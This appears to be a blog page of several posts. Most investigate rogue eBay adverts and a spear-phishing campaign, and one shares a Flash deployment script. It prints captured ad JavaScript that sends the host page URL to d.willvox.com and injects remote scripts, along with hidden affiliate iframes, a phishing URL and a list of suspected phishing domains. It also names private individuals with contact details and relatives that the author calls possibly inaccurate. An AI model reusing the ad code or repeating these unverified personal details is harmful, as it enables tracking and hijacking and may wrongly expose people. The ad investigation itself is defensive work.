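    p.feed(html)
    return p.elements


def summarise(elements):
    frames = [e for e in elements if e["tag"] == "iframe"]
    return {
        # the part of the creative the user is meant to see
        "visible": [e["host"] for e in elements if not e["hidden"]],
        "hidden_iframes": [e["host"] for e in frames if e["hidden"]],
        "hidden_pixels": [e["host"] for e in elements if e["tag"] == "img" and e["hidden"]],
        "affiliate_ids": {e["host"]: e["affiliate_id"] for e in elements if e["affiliate_id"]},
        # A hidden frame with no sandbox attribute can run script and embed
        # media; the hidden zaful frame is where the music came from.
        "unsandboxed_hidden_frames": [e["host"] for e in frames if e["hidden"] and not e["sandbox"]],
    }


if __name__ == "__main__":
    for key, value in summarise(audit_ad(AD_HTML)).items():
        print(f"{key}: {value}")
```

Two of the fields are enough to reject this creative on their own: a 725x90 banner has no business carrying four hidden full-page iframes, and only one of those four is sandboxed. The affiliate ids come out as a bonus, which is the evidence of intent the post describes.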

eBay’s only response to this is blaming the user.

ebay blaming user for bad adverts.png

If you are reading this and are affected.. it isn’t you.. it is eBay (again!). Feel free to send them to this page so they can read up on their own crappy advertising ecosystem and fix it.


Spear Phishing against Painter Decorators

This article is a work in progress, come back in a day or so please.

Unusual one this… a painter and decorator friend has been plagued by various attempts at phishing his e-mail logins over the past few months. Each time I’ve got round to investigating it the “bad page” in the email link has been removed.

Today I got to one early enough to research it while the site was still active.

It starts with a full e-mail conversation that looks like a client interested in the decorator’s services:

decorating spear phishing

The decorator responds… and then gets a reply with a supposed link to a design or work order.

This link is the phishing page.

https://zakutasinbola.info/3r69mo/bahubali.php?id=00XXX8XX

With what looks potentially like a unique id for the phishing attempt.

If the victim clicks the link they are presented with the phishing page prompting them to select their chosen login method:

decorating spear phishing page.png

decorating gmail phsihing example.png

And, if they fall for it, the deed is done.

However.. the person behind it didn’t do a good job of hiding who they are. The website is hosted in Russia but the domain involved with the one I investigated:

zakutasinbola.info

Registered by Saim Raza. They are, for other scams, using the email addresses “fu.d.too.l786@gmail.com”, “fu.d.tool7.86@gmail.com”, “fudtoo.l786@gmail.com”, “fudtool786@gmail.com”, “fudtools@gmail.com”, “fud.tools@gmail.com”, “saim.raza1338@gmail.com” and “saim.raza.133.8@gmail.com”, mainly using the telephone number “923241237632”.

Supposedly living in Lahore 31050, Pakistan, possibly with family Rizwan, Werwer Shahzaf and Noman.. just going by a Google search for the telephone number. These associations may be inaccurate.

This information sent me onto a trove of other likely phishing or malicious domains!

1869744.com
1online-activation.com
1online-activation.org
1online-reactivation.com
1online-reactivation.net
1support-technique.com
1support-technique.net
1support-technique.org
2online-activation.net
3lacmebatdone.com
9khlaovk9x.com
abhampashan.info
abhiayegawo.com
abihanirocker.com
abisuries.com
abnamro-alert.com
aboukangaz.com
abtokisikaypas.com
abtosabkadata.com
acc-bmo1-login.com
acced-desjard1-log.com
accesshelp-user.com
access-verificatiion.com
accountvalidation-services.com
accountverifynow.com
acc-secrue1.com
achasbc.com
achesbc.com
achievethem.com
achkomachko.info
achsbclog.com
acibrand.com
acoracide.com
acrotellfi.info
actidomainso.com
actuallz.tk
additiontechna.com
addonsproducts.com
adobefileshareingz.com
adobesauce.com
adobesprotct.com
adverstime.com
advisableserver.com
afabumtunpo.com
affilateservice.com
afinitycreditunion.com
agarishisabko.com
agihaitumer.info
ahlebateloop.com
ahmythsecur.com
ainakhiyand.info
aitumer.info
ajabnatyrisht.com
akhrihabhaeabm.info
alfaisalaih.com
aliancefunding.com
alibabahugia.com
alibabatred.com
alibabbaz.com
alimoladomnok.com
allgoodforno.com
allvegetablessupply.com
allvehiclepartssupply.com
almostweek.com
alorsdance.com
amdgfxclouss.info
americanhsbc.com
ameserve.com
andrjakarbol.com
angrezimain.info
anydasky.com
araboiluae.com
arabooilandgas.com
armoremsid.info
arrriyadh.com
asratgolikaw.com
assleticket.com
atbonline1.com
atharakatha.com
atratevalues.com
audia3i.com
authentisigs.pw
autonawab.com
awargithirehb.com
awaznechay.info
awlatreayhan.com
ayekhudafindorw.com
ayenetflizoa.com
ayhayu.com
azghorerinium.com
bachkrahna.com
bachpansay.com
badlakaralo.com
badnamzmana.com
badshahme.com
bakhshnanhi.com
banapastol.com
bancontact-pay.com
bandroxoma.com
bandroxxxoma.com
banigalaa.com
banking-securities.com
bankingwellssecurelogin.com
bankwithinvestec.com
banoteraswaer.com
barishkapani.info
barlessi.com
basecloudessd.com
basecoinsc.info
beacbuch.com
begumkapyar.com
beparmaishq.com
bercylesfund.com
bhagareyhum.com
bhagnews.com
bhamanihai.com
bhatiyarestor.com
bheeganimco.com
bholarecord.info
bhosabhraha.com
bilidablongra.info
bimardimagka.com
bizwalfes.com
bloshazalima.com
blueblasit.com
bm1o-sigin-logn.com
bmo1-log1n-sec.com
bmo1-mobile-online.com
bmoacaaac.com
bmo-mobile-online-update-now.com
boandamerica.com
boanewban.com
bohaytayae.com
bondpatipai.info
btanaphragr.com
btc-bh.com
bundoarvalves.com
c1bc-acc-login1.com
cablesayget.com
cakewalababa.com
camilacbila.com
canadagovcare.com
canadamobilityrefund.com
canadarevenewfix.com
canadepovd.com
cancel-subscriptionis-apple.com
canperforma.com
caranhweliyan.com
centerwaysi.com
ceo-mail.ml
chabhisovi.com
chaeslik.com
chalochalainmi.com
chalochaleinisb.com
chandmardawa.com
changigalcyar.info
chanjrandalo.com
charsetut.com
chasbardaoz.com
chaskaylartiker.info
chichongshpang.info
chintatachitata.com
chloachahuwa.com
ch-main.com
chotigandwa.com
chuthaidared.com
chutkijotum.com
citibanksibiu.com
cliendvds.com
client-collectonline.com
clnase.com
cloudcoinsc.info
cloudeprotine.com
cloudeto1mail.info
cloudevelly.info
cloud-flowss.com
cloudossione.com
clouds-server.com
codeteachna.com
cofepelayray.com
cofnirmyou.com
coinsservice.com
collect8-collect8.com
com-bz.com
come-live.tk
comensmentop.com
comiservices.com
com-v51.com
conservasprotomar.com
couptechna.com
courierd.com
courierinfos.com
courierworldson.com
credkarioy.com
cunionsuisse.com
customdnss.com
daikhnobay.info
daikhobatsunlo.com
dancealors.com
danifoss.com
dantkadard.com
dashehraeve.com
datacloude.com
datacloudeservicee.com
datanbdways.com
dataplues.com
dateshubs.com
dawatkahi.info
dc-dc7dbd92dde2.botfactorl.com
ddropss.com
deachun.com

This article is a work in progress, come back in a day or so please. (Note to author: This is also at the top of the page!)


JOURNEYCALL PINGIT

Google doesn’t have much about this payment reference. So here is an article to help!

If you have applied to South West Railway / South West Trains for a Delay Repay refund on a delayed journey you will probably see the refund on your bank account as “JOURNEYCALL PINGIT”.

Journeycall are a travel payments refund management company.


My preferred method for deploying Adobe Flash Player on a domain.

I am mainly writing this for my own reference as I always forget the script.
Sadly I also can’t credit the person who wrote this script. I didn’t write it, and I can’t find the source of the script by Googling for keywords within the batch file.
A similar version of the script is here but isn’t as feature rich.

Deploying Adobe Flash is always a pain. Firefox blocks it by default now and Chrome seems very variable: it works one day and doesn’t work the next.
Additionally, while Adobe do provide an MSI download, it doesn’t actually seem to install when set as a Group Policy Installation item. I’ve always had to fall back to the .exe using the batch file below.

@echo off

:: NAME THE EXE WITH THE VERSION NUMBER

SET latestVersion=29.0.0.113
SET version=0

:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)

:64BIT
echo 64-bit...
SET key="HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX"
goto afteroscheck

:32BIT
echo 32-bit...
SET key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX"
goto afteroscheck

:afteroscheck
:: CHECK IF FLASH AX IS INSTALLED
:: reg query must actually run here (not be stored in a variable) so that
:: ERRORLEVEL reflects whether the uninstall key exists; it is 1 when absent.
echo checking %key% for DisplayVersion
reg query %key% /v DisplayVersion >nul 2>&1
IF %ERRORLEVEL% NEQ 0 GOTO NOT_INSTALLED

:: CHECK IF FLASH AX IS LATEST
rem FOR /f "tokens=3 delims=	" %%# In (
rem 'reg query %key% /v DisplayVersion^|Find "REG_" 2^>Nul') Do (
rem Set "version=%%#"
rem echo Set version to %%#
rem )
rem echo Version in registry reports as %version%
rem IF %version% == %latestVersion% GOTO LATEST_VERSION

  for /f "delims=" %%i in ('reg query %key% /v DisplayVersion^|Find "REG_"') do (
    rem echo.%%i
    echo.%%i | findstr /C:%latestVersion% 1>nul
    if errorlevel 1 (
      echo not current version installed
      Set "version=notcurrent"
    ) ELSE (
      echo Already Installed
      GOTO LATEST_VERSION
    )
  )

:: SEE IF IE IS RUNNING
:IE_CHECK
TASKLIST /NH | FIND /I "iexplore.exe"
IF %ERRORLEVEL%==1 GOTO INSTALL_AX
echo.
echo.
echo Internet Explorer was detected to be running.  Adobe Flash Player installation cannot continue.
echo.
echo.
GOTO END

:NOT_INSTALLED
echo Adobe Flash Player for ActiveX not found, installing...
GOTO IE_CHECK

:INSTALL_AX
start "FlashAX" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_active_x.exe" -install
start "FlashPlugin" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_plugin.exe" -install
start "FlashChrome" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_ppapi.exe" -install
echo Completed installation of Adobe Flash Player version %latestVersion% for ActiveX.
GOTO END

:LATEST_VERSION
echo Version %latestVersion% of Adobe Flash Player for ActiveX is already installed.
GOTO END

:END

Remember to change latestVersion=29.0.0.113 to the version of Flash you are installing. Also change the path to the 3 installation files further down in the script; the script only compares the registry DisplayVersion against latestVersion, so it will reinstall whenever the two differ.
Hope this helps someone!


Rogue adverts redirecting ebay visitors off-site. (d.willvox.com and www.gamiss.com/?lkid=13368106)

UPDATE: THE SAME JUNK STARTED PLAYING MUSIC! see the new article

ebay gamiss advert page

Today while browsing eBay I was taken off the eBay site several times and onto “www.gamiss.com/?lkid=13368106”. I did not click or even mouse over any advert.

I’ve seen this happen about 3 or so times in the past year with eBay but today I had time to investigate and trace what is going on.

It looks like eBay are sending visitors to an advertising partner called “pubmatic.com”, who are in turn sending the visitor to “mathtag.com”, who are then sending advert JavaScript with content referencing “d.willvox.com” and “zaful.com”.

[Screenshots: ebay request 1 to ebay request 5 (browser network captures of the redirect chain)]

The most interesting parts of the exchange are:

pubmatic.com returning the following Javascript:

https://tags.mathtag.com/notify/js?exch=pub&id=5aW95q2jLzE0LyAvTTJSaU9XVTNOR1F0TlRnME5TMDROV1V5TFRBd01EQXRNREF3TURBd01EQXdNREF3LzIwMDUzNzQ4NjYyMzQ4OTkxODMvNTM0NDE2My8yOTAzNjMxLzMvTkNYN2Nkai1NMnNVcXBoLVF2b3pkMnBkaHhDbEdlZUg4R2pkdVpSOXRrcy8xLzMvMTUxOTY2NjIwMC8wLzU3OTM1Ni8xMzU5MTA5NjMyLzIwMTAwMi80NDM4MDIvMS8wLzAvTURBd01EQXdNREF0TURBd01DMHdNREF3TFRBd01EQXRNREF3TURBd01EQXdNREF3LzAvMC8wLzAvMC8yMDA1Mzc0ODY2MjM0ODk5MTgzL3pyaC8/NVxI2XsTKGxAGahgZIG3pD1Qquo&sid=2903631&cid=5344163&nodeid=1135&price=0.091&group=eu&auctionid=2005374866234899183&bp=a_ajbcci&3pck=http://clicktrack.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=JnB1YklkPTE1NTIxMiZzaXRlSWQ9MTU1MjEzJmFkSWQ9OTUyMDE1JmthZHNpemVpZD0yMjUmdGxkSWQ9MzU0MDkzODUmY2FtcGFpZ25JZD0xNjczNSZjcmVhdGl2ZUlkPTAmYWRTZXJ2ZXJJZD0yNDMmaW1waWQ9RTQ4OTczRjYtREM2Ri00ODMyLTg1NkUtNjM5NkNCQTk1QzE4JnBhc3NiYWNrPTA=_url=

This references tags.mathtag.com, something to do with Math Media, an advertising agency or system.

Mathtag then sends the following JavaScript:

        ! function() {
            var e, t = "https://d.willvox.com",
                n = "5a40ca64fc0c4d14be22ffa8",
                r = {},
                o = {
                    10: "2005374866234899183",
                    9: "[SUBID]",
                    8: "https%3A//ebayadvertising.co.uk/",
                    7: "[LOCATION_LAT]",
                    6: "[LOCATION_LONG]",
                    5: "[DEVICEID]"
                },
                a = {
                    10: "2903631",
                    9: "5344163",
                    8: "[CUSTOM3]",
                    7: "[CUSTOM4]",
                    6: "[CUSTOM5]",
                    5: "[CUSTOM6]"
                },
                c = {
                    10: "[APP_NAME]",
                    9: "[IDFA]",
                    8: "[AID]"
                };
            try {
                for (var d = 10; d > 4;) r["z" + d] = o[d], r["c" + d] = a[d], d--;
                for (d = 10; d > 7;) r["a" + d] = c[d], d--;
                var i = m(r);

                function m(e) {
                    var t, n;
                    for (var r in "object" == typeof e && (t = ""), e) e.hasOwnProperty(r) && (t = t + "&" + r + "=" + (n = e[r], encodeURIComponent(n)));
                    return t
                }

                function p() {
                    if (window.top) return window.top;
                    for (var e = window; e.parent;) e = e.parent;
                    return e
                }

                function s() {
                    try {
                        return p().document.location.href
                    } catch (e) {
                        try {
                            return p().location.hostname
                        } catch (e) {
                            return function() {
                                try {
                                    var e = window.parent.location.ancestorOrigins;
                                    if (e && e.length >= 1) return e[e.length - 1]
                                } catch (e) {}
                            }()
                        }
                    }
                }

                function l(e) {
                    if ("" !== e.responseText) {
                        var t, n = document.createElement("div");
                        n.innerHTML = "<div>" + e.responseText + "</div>", n = n.firstChild, document.body.appendChild(n);
                        var r = document.getElementById("adder-inisder"),
                            o = n.getElementsByTagName("script");
                        if (o.length > 0)
                            for (var a = 0; a < o.length; ++a) {
                                u(o[a])
                            }
                        r.parentNode.appendChild(n), r.parentNode.removeChild(r)
                    } else {
                        (t = document.createElement("div")).className = "ad-serve-image", t.innerHTML = '<a>  <img src="https://d.willvox.com/ad/zaful.jpg" height="250" width="300"> </a>', document.getElementById("adder-inisder").parentNode.appendChild(t);
                        var c = document.getElementById("adder-inisder");
                        c.parentNode.removeChild(c)
                    }
                }

                function u(e) {
                    var t = document.createElement("script");
                    e && (e.text ? t.text = e.text : e.src && (t.src = e.src)), e.parentNode.appendChild(t), e.parentNode.removeChild(e)
                }

                function h() {
                    if (200 !== this.status) {
                        if ("complete" !== document.readyState) var e = setInterval(function() {
                            "complete" === document.readyState && (clearInterval(e), f())
                        }, 140);
                        "complete" === document.readyState ? f() : l(this)
                    } else l(this)
                }

                function f() {
                    try {
                        e = !(window.self === window.top)
                    } catch (t) {
                        e = !0
                    }
                    var r = t.concat("/?pid=") + n,
                        o = {};
                    e ? (o.mt = function() {
                        try {
                            return p().document.URL
                        } catch (e) {
                            try {
                                return p().frames[0].document.referrer
                            } catch (e) {}
                        }
                    }() || "", o.hn = s() || "") : (o.hn = window.location.hostname, o.mt = function() {
                        try {
                            for (var e = document.getElementsByTagName("meta"), t = 0; t < e.length; t++) {
                                var n = e[t];
                                if ("og:url" === n.getAttribute.property) return n.getAttribute("content")
                            }
                        } catch (e) {}
                    }() || ""), r += m(o), r += i;
                    var a = new XMLHttpRequest;
                    a.onload = h, a.open("GET", r), a.send()
                }
                f()
            } catch (e) {
                document.getElementById("adder-inisder").parentNode.removeChild(zpscript)
            }
        }();

This code looks like it is supposed to be showing the following advert: https://d.willvox.com/ad/zaful.jpg, possibly if the browser doesn’t support JavaScript(?), but it also triggers yet another request to https://d.willvox.com (see the last screenshot), which responds with:

<a href="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600" target="_parent"><img width="725" height="90" src="https://ae01.alicdn.com/kf/HTB1VhqnX1GSBuNjSspb763iipXaZ/EN_728_90.png"/></a>
<img width="725" height="90" src="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600&af=[URL]&cn=[CUSTOM1]&cv=[CUSTOM2]&dp=[CB]" style="display:none;">
<iframe src="https://www.gearbest.com/promotion-8-march-special-1216.html?lkid=13364449" style="display: none"></iframe>
<iframe src="https://www.zaful.com/m-promotion-active-valentines-sale.html?innerid=35&lkid=13266105" style="display:none"></iframe>
<iframe src="https://www.gamiss.com/?lkid=13368106" style="display:none"></iframe>
<iframe src="https://www.rosegal.com/promotion-christmas-sale.html?lkid=12369082" style="display:none"></iframe>

And the deed is done. Something within the iframe for gamiss hijacks the entire page and takes you off ebay. It looks like an attempt to deploy affiliate cookies to people so that when, and if, they visit the websites referenced above and make a purchase – the person behind the junk adverts gets a kickback.
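As an added example (not code from the original post), the following Python audits a creative like the d.willvox.com response above: it parses the HTML and reports every hidden element that loads a third-party host, together with the affiliate identifiers (lkid and the aliexpress tracking parameters) it carries. The sample HTML is reconstructed from the response quoted above, and the page host ebay.co.uk is an assumption.

```python
"""Flag hidden third-party frames and affiliate ids inside an ad creative.

Added example, not part of the original post: given the HTML an ad server
returns, list every <iframe>/<img>/<script> that is both display:none and
points at a host other than the page being viewed, and pull out the
affiliate identifiers on its URL. Hidden cross-site frames with lkid-style
parameters are the affiliate-cookie-stuffing pattern described above.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Constructed sample modelled on the d.willvox.com response quoted in the
# post; the URLs and lkid values are copied from it, nothing else is live.
SAMPLE_CREATIVE = """
<a href="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600" target="_parent"><img width="725" height="90" src="https://ae01.alicdn.com/kf/HTB1VhqnX1GSBuNjSspb763iipXaZ/EN_728_90.png"/></a>
<img width="725" height="90" src="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600&af=[URL]&cn=[CUSTOM1]&cv=[CUSTOM2]&dp=[CB]" style="display:none;">
<iframe src="https://www.gearbest.com/promotion-8-march-special-1216.html?lkid=13364449" style="display: none"></iframe>
<iframe src="https://www.zaful.com/m-promotion-active-valentines-sale.html?innerid=35&lkid=13266105" style="display:none"></iframe>
<iframe src="https://www.gamiss.com/?lkid=13368106" style="display:none"></iframe>
<iframe src="https://www.rosegal.com/promotion-christmas-sale.html?lkid=12369082" style="display:none"></iframe>
"""

# Query parameters that identify who gets the affiliate kickback; taken from
# the URLs in the captured response (lkid on the shops, af/cn/cv on aliexpress).
AFFILIATE_PARAMS = ("lkid", "af", "cn", "cv")
LOADING_TAGS = ("iframe", "img", "script")


def _is_hidden(style):
    """True for display:none with any spacing, e.g. 'display: none'."""
    return "display:none" in (style or "").replace(" ", "").lower()


class CreativeAuditor(HTMLParser):
    """Collects hidden, cross-site resource loads found in an ad creative."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    # HTMLParser also routes self-closing tags (<img .../>) through here.
    def handle_starttag(self, tag, attrs):
        if tag not in LOADING_TAGS:
            return
        a = dict(attrs)
        src = a.get("src")
        if not src:
            return
        url = urlparse(src)
        host = url.hostname or ""
        # Same-site loads are the page's own business; everything else is
        # a third party being contacted from inside the ad slot.
        third_party = bool(host) and not host.endswith(self.page_host)
        if third_party and _is_hidden(a.get("style")):
            query = parse_qs(url.query)
            ids = {k: query[k][0] for k in AFFILIATE_PARAMS if k in query}
            self.findings.append({"tag": tag, "host": host, "affiliate": ids})


def audit_creative(html, page_host):
    """Return the list of hidden third-party loads, in document order."""
    auditor = CreativeAuditor(page_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for f in audit_creative(SAMPLE_CREATIVE, "ebay.co.uk"):
        print(f"hidden <{f['tag']}> -> {f['host']}  affiliate={f['affiliate']}")
```

Running it against the sample lists the hidden aliexpress tracking image and the four hidden shop iframes with their lkid values, while the visible banner image is ignored.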

Piss poor vetting and subsequent takedown of rogue adverts. This has been a problem for at least a couple of days at this point. eBay is what I’ve seen people refer to as a “dumpster fire”. Lacking competition and drive to do things right.

Looking into the domain involved more (d.willvox.com) it seems that the following person is the owner of the domain:

Email maheshrajiv@gmail.com 
Name Thevar
Organization Mahesh
Street Address
Matunga
Mumbai
Maharashtra
400019
India

Phone 919029929719

They also own other similarly named and fishy looking domains:
